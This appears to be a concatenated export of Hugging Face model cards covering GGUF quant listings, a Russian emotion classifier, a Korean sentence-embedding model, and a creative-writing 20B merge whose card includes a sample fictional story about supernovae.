<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/neovalle/H4rmoniousAnthea_V.2
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
seara/rubert-base-cased-ru-go-emotions | seara | "2023-08-25T19:26:01Z" | 3,569 | 2 | transformers | [
"transformers",
"pytorch",
"safetensors",
"bert",
"text-classification",
"sentiment-analysis",
"multi-label-classification",
"sentiment analysis",
"rubert",
"sentiment",
"russian",
"multilabel",
"classification",
"emotion-classification",
"emotion-recognition",
"emotion",
"ru",
"dataset:seara/ru_go_emotions",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | "2023-05-02T17:05:52Z" | ---
license: mit
language:
- ru
metrics:
- f1
- roc_auc
- precision
- recall
pipeline_tag: text-classification
tags:
- sentiment-analysis
- multi-label-classification
- sentiment analysis
- rubert
- sentiment
- bert
- russian
- multilabel
- classification
- emotion-classification
- emotion-recognition
- emotion
datasets:
- seara/ru_go_emotions
---
This is the [RuBERT](https://huggingface.co/DeepPavlov/rubert-base-cased) model fine-tuned for __emotion classification__ of short __Russian__ texts.
The task is a __multi-label classification__ with the following labels:
```yaml
0: admiration
1: amusement
2: anger
3: annoyance
4: approval
5: caring
6: confusion
7: curiosity
8: desire
9: disappointment
10: disapproval
11: disgust
12: embarrassment
13: excitement
14: fear
15: gratitude
16: grief
17: joy
18: love
19: nervousness
20: optimism
21: pride
22: realization
23: relief
24: remorse
25: sadness
26: surprise
27: neutral
```
Label to Russian label:
```yaml
admiration: восхищение
amusement: веселье
anger: злость
annoyance: раздражение
approval: одобрение
caring: забота
confusion: непонимание
curiosity: любопытство
desire: желание
disappointment: разочарование
disapproval: неодобрение
disgust: отвращение
embarrassment: смущение
excitement: возбуждение
fear: страх
gratitude: признательность
grief: горе
joy: радость
love: любовь
nervousness: нервозность
optimism: оптимизм
pride: гордость
realization: осознание
relief: облегчение
remorse: раскаяние
sadness: грусть
surprise: удивление
neutral: нейтральность
```
## Usage
```python
from transformers import pipeline
model = pipeline(model="seara/rubert-base-cased-ru-go-emotions")
model("Привет, ты мне нравишься!")
# [{'label': 'love', 'score': 0.5456761717796326}]
```
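Since the task is multi-label, you may want the scores for all 28 labels rather than only the top one. A rough sketch, assuming a recent `transformers` version that supports `top_k=None`; the 0.3 threshold is an arbitrary illustration, not a tuned value.
```python
# Minimal sketch: return every emotion score and keep those above a threshold.
# top_k=None requests all label scores; function_to_apply="sigmoid" is the usual
# choice for multi-label outputs. The 0.3 threshold is illustrative only.
from transformers import pipeline

model = pipeline(model="seara/rubert-base-cased-ru-go-emotions")
results = model(["Привет, ты мне нравишься!"], top_k=None, function_to_apply="sigmoid")
scores = results[0]  # list of {"label", "score"} dicts for the first text
predicted = [s for s in scores if s["score"] > 0.3]
print(predicted)
```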
## Dataset
This model was trained on a translated GoEmotions dataset called [ru_go_emotions](https://huggingface.co/datasets/seara/ru_go_emotions).
An overview of the training data can be found on [Hugging Face card](https://huggingface.co/datasets/seara/ru_go_emotions) and on
[Github repository](https://github.com/searayeah/ru-goemotions).
## Training
Training was done in this [project](https://github.com/searayeah/bert-russian-sentiment-emotion) with these parameters:
```yaml
tokenizer.max_length: null
batch_size: 32
optimizer: adam
lr: 0.00001
weight_decay: 0
num_epochs: 5
```
## Eval results (on test split)
| |precision|recall|f1-score|auc-roc|support|
|--------------|---------|------|--------|-------|-------|
|admiration |0.66 |0.66 |0.66 |0.93 |504 |
|amusement |0.79 |0.81 |0.8 |0.97 |264 |
|anger |0.53 |0.3 |0.39 |0.91 |198 |
|annoyance |0.0 |0.0 |0.0 |0.82 |320 |
|approval |0.62 |0.25 |0.36 |0.82 |351 |
|caring |0.69 |0.13 |0.22 |0.86 |135 |
|confusion |0.56 |0.18 |0.28 |0.92 |153 |
|curiosity |0.52 |0.4 |0.45 |0.95 |284 |
|desire |0.67 |0.24 |0.35 |0.89 |83 |
|disappointment|0.88 |0.05 |0.09 |0.82 |151 |
|disapproval |0.56 |0.17 |0.26 |0.88 |267 |
|disgust |0.83 |0.2 |0.33 |0.92 |123 |
|embarrassment |0.0 |0.0 |0.0 |0.88 |37 |
|excitement |0.78 |0.14 |0.23 |0.9 |103 |
|fear |0.83 |0.37 |0.51 |0.92 |78 |
|gratitude |0.94 |0.9 |0.92 |0.99 |352 |
|grief |0.0 |0.0 |0.0 |0.72 |6 |
|joy |0.7 |0.4 |0.51 |0.94 |161 |
|love |0.77 |0.81 |0.79 |0.97 |238 |
|nervousness |0.0 |0.0 |0.0 |0.85 |23 |
|optimism |0.66 |0.52 |0.58 |0.92 |186 |
|pride |0.0 |0.0 |0.0 |0.76 |16 |
|realization |0.0 |0.0 |0.0 |0.74 |145 |
|relief |0.0 |0.0 |0.0 |0.72 |11 |
|remorse |0.58 |0.68 |0.63 |0.99 |56 |
|sadness |0.58 |0.44 |0.5 |0.92 |156 |
|surprise |0.62 |0.45 |0.52 |0.91 |141 |
|neutral |0.72 |0.47 |0.57 |0.84 |1787 |
|micro avg |0.7 |0.42 |0.53 |0.94 |6329 |
|macro avg |0.52 |0.31 |0.36 |0.88 |6329 |
|weighted avg |0.63 |0.42 |0.49 |0.88 |6329 |
|
mradermacher/Falcon2-8B-Spanish-GGUF | mradermacher | "2024-06-05T17:44:35Z" | 3,569 | 0 | transformers | [
"transformers",
"gguf",
"mergekit",
"merge",
"es",
"base_model:ssmits/Falcon2-8B-Spanish",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-05T17:16:06Z" | ---
base_model: ssmits/Falcon2-8B-Spanish
language:
- es
library_name: transformers
license: apache-2.0
quantized_by: mradermacher
tags:
- mergekit
- merge
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/ssmits/Falcon2-8B-Spanish
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q2_K.gguf) | Q2_K | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.IQ3_XS.gguf) | IQ3_XS | 3.7 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.IQ3_S.gguf) | IQ3_S | 3.8 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q3_K_S.gguf) | Q3_K_S | 3.8 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.IQ3_M.gguf) | IQ3_M | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q3_K_M.gguf) | Q3_K_M | 4.1 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q3_K_L.gguf) | Q3_K_L | 4.4 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.IQ4_XS.gguf) | IQ4_XS | 4.6 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q4_K_S.gguf) | Q4_K_S | 4.8 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q4_K_M.gguf) | Q4_K_M | 5.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q5_K_S.gguf) | Q5_K_S | 5.8 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q5_K_M.gguf) | Q5_K_M | 6.1 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q6_K.gguf) | Q6_K | 6.8 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q8_0.gguf) | Q8_0 | 8.7 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.f16.gguf) | f16 | 16.3 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
sebdg/puzzle_tools_llama3 | sebdg | "2024-06-26T02:20:56Z" | 3,567 | 0 | transformers | [
"transformers",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"en",
"base_model:unsloth/llama-3-8b-Instruct-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-26T00:49:12Z" | ---
base_model: unsloth/llama-3-8b-Instruct-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- gguf
---
# Uploaded model
- **Developed by:** sebdg
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3-8b-Instruct-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
jhgan/ko-sbert-sts | jhgan | "2022-08-16T12:45:38Z" | 3,563 | 7 | sentence-transformers | [
"sentence-transformers",
"pytorch",
"tf",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"endpoints_compatible",
"region:us"
] | sentence-similarity | "2022-03-02T23:29:05Z" | ---
pipeline_tag: sentence-similarity
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
---
# ko-sbert-sts
This is a [sentence-transformers](https://www.SBERT.net) model: It maps sentences & paragraphs to a 768 dimensional dense vector space and can be used for tasks like clustering or semantic search.
<!--- Describe your model here -->
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["안녕하세요?", "한국어 문장 임베딩을 위한 버트 모델입니다."]
model = SentenceTransformer('jhgan/ko-sbert-sts')
embeddings = model.encode(sentences)
print(embeddings)
```
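For a sentence-similarity use case, the embeddings can be compared directly. A brief sketch using `sentence_transformers.util.cos_sim`; the sentence pair is illustrative.
```python
# Minimal sketch: cosine similarity between two Korean sentence embeddings.
from sentence_transformers import SentenceTransformer, util

model = SentenceTransformer('jhgan/ko-sbert-sts')
embeddings = model.encode(["안녕하세요?", "한국어 문장 임베딩을 위한 버트 모델입니다."], convert_to_tensor=True)
print(util.cos_sim(embeddings[0], embeddings[1]))
```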
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
#Mean Pooling - Take attention mask into account for correct averaging
def mean_pooling(model_output, attention_mask):
token_embeddings = model_output[0] #First element of model_output contains all token embeddings
input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('jhgan/ko-sbert-sts')
model = AutoModel.from_pretrained('jhgan/ko-sbert-sts')
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, mean pooling.
sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Evaluation Results
<!--- Describe how your model was evaluated -->
These are the results of training on the KorSTS training dataset and then evaluating on the KorSTS evaluation dataset.
- Cosine Pearson: 81.55
- Cosine Spearman: 81.23
- Euclidean Pearson: 79.94
- Euclidean Spearman: 79.79
- Manhattan Pearson: 79.90
- Manhattan Spearman: 79.75
- Dot Pearson: 76.02
- Dot Spearman: 75.31
## Training
The model was trained with the parameters:
**DataLoader**:
`torch.utils.data.dataloader.DataLoader` of length 719 with parameters:
```
{'batch_size': 8, 'sampler': 'torch.utils.data.sampler.RandomSampler', 'batch_sampler': 'torch.utils.data.sampler.BatchSampler'}
```
**Loss**:
`sentence_transformers.losses.CosineSimilarityLoss.CosineSimilarityLoss`
Parameters of the fit()-Method:
```
{
"epochs": 5,
"evaluation_steps": 1000,
"evaluator": "sentence_transformers.evaluation.EmbeddingSimilarityEvaluator.EmbeddingSimilarityEvaluator",
"max_grad_norm": 1,
"optimizer_class": "<class 'transformers.optimization.AdamW'>",
"optimizer_params": {
"lr": 2e-05
},
"scheduler": "WarmupLinear",
"steps_per_epoch": null,
"warmup_steps": 360,
"weight_decay": 0.01
}
```
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 128, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False})
)
```
## Citing & Authors
<!--- Describe where people can find more information -->
- Ham, J., Choe, Y. J., Park, K., Choi, I., & Soh, H. (2020). Kornli and korsts: New benchmark datasets for korean natural language understanding. arXiv
preprint arXiv:2004.03289
- Reimers, Nils and Iryna Gurevych. “Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks.” ArXiv abs/1908.10084 (2019)
- Reimers, Nils and Iryna Gurevych. “Making Monolingual Sentence Embeddings Multilingual Using Knowledge Distillation.” EMNLP (2020)
|
DavidAU/TieFighter-Holodeck-Holomax-Mythomax-F1-V1-COMPOS-20B-gguf | DavidAU | "2024-05-25T02:04:36Z" | 3,563 | 1 | null | [
"gguf",
"not-for-all-audiences",
"art",
"creative",
"roleplay",
"story",
"fiction",
"scene writing",
"composite model",
"merge-kit",
"unpredictable",
"en",
"license:apache-2.0",
"region:us"
] | null | "2024-05-18T00:04:35Z" | ---
license: apache-2.0
language:
- en
tags:
- not-for-all-audiences
- art
- creative
- roleplay
- story
- fiction
- scene writing
- composite model
- merge-kit
- unpredictable
---
<B>Creative, Brainstorming, Roleplay, Long Form, Story, Scene, And Fiction Generation:
Model Version 1, Formula 1</B>
Breaking the Predictive Path.
<img src="tie-wild.jpg">
This model is a mixture of 4 highly creative models using a very different form of merging: composite.
This model EXCELS in long form [often exceeding 1500 tokens - without being told to do so], highly creative output with a minimum of input.
(see samples below)
In testing its output almost reaches "Hitch Hikers to the Galaxy" level prose.
It makes up words, societies, worlds, excuses, has a sense of humour and can be lightly sarcastic and
even "self-aware" (of its own prose's folly) and it goes and goes and ...... GGOOOOEEEESSSSS.....
It is wildly unpredictable and verbose.
It does swear on occasion, and sometimes uses: @#$ in place of swear words.
The model was formed by taking layers from each model according to a formula, rather than using "math" to merge them together.
The reason for this is that, after a lot of tests, the "regular merging" methods resulted in too much loss of each model's unique attributes.
This is also an upscale too as the original models were 13B parameters each.
Part of the upscale is to allow room to integrate the models together, as well as to give the model "room to stretch its legs," so to speak.
More layers = more complex output, reasoning and so on.
The result is a 20B parameter model with one main brain and 3 sub-brains all working intermeshed together.
The goal of this project was to disrupt the predictability of the final model just enough to change the creativity of it,
while keeping it "sane" and not subject to err... crashing, exploding... you know the rest.
In other words: Inject the Ghost into the Machine.
Creating this model took a lot of applied theory and trial and error, primarily to make it usable and stable.
As of this writing there are 5 working formulas to do this, with various offshoots of these too.
As of this date further testing is required to see if these formulas/methods can be applied to other models and/or
other merges and/or larger more complex merges [next steps].
Version 1 refers to the actual mix of the models themselves.
Currently there are 4 main mixes available with 4 different permutations each.
Not clear if or when these will be uploaded as they are still undergoing testing.
There are also additional versions of "version 1" using the different formulas.
Same as above... more testing to go.
There are some examples below, as well as methods you can use to get the most out of this model,
and many of these methods can be applied to all other models too.
First though, model credits to the model creators:
https://huggingface.co/KoboldAI/LLaMA2-13B-Tiefighter
https://huggingface.co/KoboldAI/LLAMA2-13B-Holodeck-1
https://huggingface.co/KoboldAI/LLaMA2-13B-Holomax
https://huggingface.co/Gryphe/MythoMax-L2-13b
These people deserve the love and support hands down.
And special thanks to:
Mergekit - Multiple Model Merging Automation [free]:
https://github.com/arcee-ai/mergekit
LLAMACPP - Create and run LLMs [free]:
https://github.com/ggerganov/llama.cpp
LMSTUDIO - Discover, download, and run local LLMs [free]:
https://lmstudio.ai/
WEB UI: GGUF, GPTQ, EXL2, Transformers, Roleplay [free]
https://github.com/oobabooga/text-generation-webui
KOBOLD-AI: AI, Roleplay, Adventure, Story [free]:
https://github.com/LostRuins/koboldcpp
FARADAY.dev / Backyard AI: Roleplay [free]
https://backyard.ai/desktop
For without you and your endless verve this project would not have been possible.
All of these are multi-platform - Windows, Mac, Linux, etc.
If you are looking for more UIs, interfaces and methods to run GGUF models,
see the LLAMACPP site's main page (about 1/4 down).
++++++++++++++++++++++++++++++++++++++++++
<B>THIS REPO:</B>
++++++++++++++++++++++++++++++++++++++++++
All the GGUF quants for both regular (8) and Imatrix (22) denoted by "imat" are located here.
Due to the nature of this specific model it is suggested to download a number of different versions.
See below.
++++++++++++++++++++++++++++++++++++++++++
<B>TEST PROMPTS:</B>
++++++++++++++++++++++++++++++++++++++++++
TEST with "TEMP:0, CTX:2048*" / "TEMP:.8 , CTX:2048*"
(the model may exceed this context level)
(* this is NOT maximum context, see model notes below)
These prompts have no right answer and are therefore perfect for testing a creative model.
1:
Give me 3 fictional reasons a sun went supernova of 500 words for each reason.
2:
The skyscraper swayed, as she watched the window in front of her on the 21 floor explode.
3:
Using the following "story idea" below, write the first scene in the novel introducing the young woman. This scene should start in the middle of the action, include dialog, vivid passages, and end on a cliffhanger relevant to the story idea but it should also be unexpected. The scene should be 1000 words long and escalate in conflict and suspense and be written in first person, present tense with the point of view character being the young woman.
Story idea:
In a world ruled by dictatorship, a rebel young woman leads a rebellion against the system. Despite the risks, she fights to overthrow the dictator and restore democracy to her country. The government executes her for treason, but she sticks to her beliefs and is responsible for starting the revolution.
++++++++++++++++++++++++++++
<B>EXAMPLE 1:</B>
++++++++++++++++++++++++++++
(q4km - non imatrix, set at TEMP 0 (see why below))
Q: Give me 3 fictional reasons a sun went supernova of 500 word for each reason.
AI:
Reason 1: Sol's Vengeance
Sol was not always known as the life-giver it is today. Once upon a time, it was a red dwarf star known as Sol III B. It had seven planets revolving around it, teeming with life. However, one day, an interstellar cloud of gas and dust passed too close to the solar system. The gravitational pull on the gas giant in the habitable zone, named Nibiru after the Sumerian god of the seafloor, was so strong that it began to tear apart its own moon.
The moon's debris field, the size of a small planetoid, hurtled towards Sol III B at a significant percentage of the speed of light. Sol had no way of knowing what was coming. It was caught off guard when the projectile slammed into its photosphere with the force of a billion supernovas combined.
The impact released more energy in a fraction of a second than Sol III B would have given off in its entire lifespan as a red dwarf star. The shockwave from the explosion was so powerful that it ripped apart the outer layers of the star, vaporizing them instantly and creating a supernova.
As the fire consumed Sol III B from the inside out, the remaining planets were engulfed in the blistering heat. Life on each world perished as the atmosphere was stripped away by the searing radiation. The surviving debris field coalesced under its own gravity, forming a new star known as Sol I A.
Centuries later, after the newly formed red dwarf had had time to cool and regain its composure, it began to attract a new assortment of planets, moons, and other celestial debris. Life returned to the newly reborn solar system, unaware of what had happened here before.
Sol I A, now known simply as Sol, swore vengeance on the unseen hand that had destroyed its twin so cruelly. It vowed revenge on whoever or whatever had committed this atrocity against it and its family. Sol bided its time, waiting...
*Cue ominous music*
Reason 2: The Curse of Xolotl
In the heart of the Orion Arm, there lay a system known as Xolotl. It was a peaceful place, teaming with life. At its center burned a yellow dwarf star named for the Aztec god of oblivion. Life teemed on and around the worlds that orbited it: Xolotl A I, II A, III B, IV C...
The ninth planet in the system was known as Xolotl IX Delta. It was a barren, tectonically active world covered in perpetual storms of fire and lightning. Life had never managed to gain a foothold there, but that didn't stop the inhabitants of the other planets from visiting it occasionally for their own reasons.
The indigenous lifeforms on Xolotl III B worshipped a pantheon of benevolent deities who were said to have created them in Their image. They lived in peace and harmony, unaware of the malevolence that lurked beyond their world.
One day, a group of intrepid explorers from Xolotl III B bravely set out on a journey to explore the ninth planet. Curiosity was a powerful force, stronger than even the wrath of their gods. Upon reaching the surface of Xolotl IX Delta, they were struck with awe at the raw power and beauty of the world around them.
They built shrines to their benevolent deities on top of extinct volcanoes, offering sacrifices in supplication for continued safety and prosperity. Unbeknownst to them, they had awakened an ancient evil that had been slumbering deep within the planet's core for millennia.
The heart of Xolotl IX Delta was a massive black hole, warped space-time itself. Legends spoke of it as the eye of the great serpent, which circled the world eternally, consuming lesser stars and planets in its endless hunger. The explorers had awakened it from its eons-long slumber, and now there was no going back.
The black hole began to feed on the energy of Xolotl III B and its sun, sucking the life out of the system like a parasite. Sol I A tried desperately to break free of the gravitational death-grip of the monstrous singularity, but it was no use. Slowly but inexorably, the other planets were drawn inexorably towards their doom as well.
Sol I A put up a valiant fight, but in the end, even stars could only burn for so long. The black hole consumed everything around it, reducing the once-thriving system to a sea of searing gas and swirling space dust. Sol itself was no exception. In the end, the very star that had given life to countless worlds and untold numbers of sentient beings became fuel for the ravenous maw of the cosmic monster it had unwittingly awoken.
And so Sol I A, known as Sol to its new tenants, met the same end as its twin: a spectacular supernova that lit up the night sky like a thousand suns, outshining its own brilliance in its final act of defiance against the malevolent force that had doomed them all.
*Cue ominous music*
Reason 3: The Curse of Xenocide
In a distant arm of the universe, there lay a system known as Xenocide. It was named for the atrocity that had occurred there long ago, during the days of the first interstellar empires. Life had come to this corner of the cosmos on the winds of chance, drifting on the currents of space-time like so much flotsam and jetsam.
The system was home to seven worlds, each teeming with life in its own unique key: Xenocide I A, II B, III G... IX Delta. The sevenths were twins, so similar that even the most discerning eye would have trouble telling them apart from a distance.
The two planets orbited their sun in perfect synchronicity, one side perpetually bathed in light and heat while the other was engulfed in perpetual night. Life had evolved differently on each world, but only in the finer details. The beings that scampered and soared across the surface of Xenocide VII A were physically indistinguishishable from their counterparts on Xenocide VII B...
Until the day the first interstellar empire arrived.
The empire had been expanding at a rate faster than even life itself for millennia, devouring worlds and civilizations like a ravenous beast. They had come upon Xenocide by chance, drawn here by rumors of a world-devouring god-beast said to dwell in the system's star-heart.
Curiosity was a powerful motivator, stronger than even the fear of the unknown. The empire sent a small scouting fleet to investigate, hoping to either prove or disprove the rumors once and for all.
The scouts found a world as beautiful as it was peaceful. They landed on Xenocide VII A, beaming down images of a paradise world teeming with life to their waiting flagship in orbit. The images were so breathtakingly beautiful that the empire's rulers knew they had found a new prize to add to their already impressive trophy collection.
The scouts beamed back a single message: "Found them, majesty. Life as we know it."
With that, the empire struck.
Wave after wave of warships descended upon Xenocide VII A, unleashing firepower so devastating that the world itself was reduced to molten slag in mere instants. The atmosphere boiled away in an atmosphere of flame and ash, leaving the surface of the once-lush world as barren and lifeless as the airless face of the moon.
Meanwhile, on its twin world in the grip of perpetual night, the inhabitants of Xenocide VII B were blissfully unaware of the doom that had just claimed their near-twin. They continued to live out their lives, unaware of the storm cloud of death that was gathering on the horizon.
*Cue ominous music*
Sol IA, still known as Sol to its new tenants, circled the blackened husk of Xenocide VII A for untold years. It watched as the debris field from the destroyed worlds and the remains of the empire's warships drifted away on the photon currents like space-faring flotsam and jetsam.
Centuries passed, millennu, eons, while Sol orbited the cold, lifeless husk of what had once been its twin world. And as it circled, a thought gnawed at the back of its star-heart like a parasitic worm: vengeance.
Sol IA watched and waited, biding its time, plotting its revenge. It would not be thwarted this time, Sol vowed. Vengeance would be sweet, and it would savor every delicious morsel as it exacted its bloody venvengeance upon the empire that had dared to defile the sanctity of life itself.
*Cue ominous music*
The day of Sol's vengeance finally came round again, like a comet hurtling in from the blackness of space-time itself. Sol IA flared with a fury that outshone even the combined might of all the suns in the known universe combined. The resulting supernova was so bright that it could reportedly be seen from the other side of the known cosmos, if any sentient being had been unfortunate enough to survive long enough to look directly at it with their remaining, charred eyeballs.
*Cue ominous music*
The shockwave from Sol's supernova was felt across all of space-time itself. Stars and planets alike were either reduced to their component elements or flung from the system like so much space debris in the aftershock. The empire that had once stood proudly at the pinnacle of creation was no more, reduced to a smear on the face of history by the vengeance of one vengeful star.
*Cue ominous music*
Centuries passed, millennia, and still Sol IA circled the cold, lifeless husk that was all that remained of Xenocide VII A/B. The supernova remnants glowed red-hot in the darkness, a perpetual reminder of what happened when mankind played god with the cosmos itself.
*Cue ominous music*
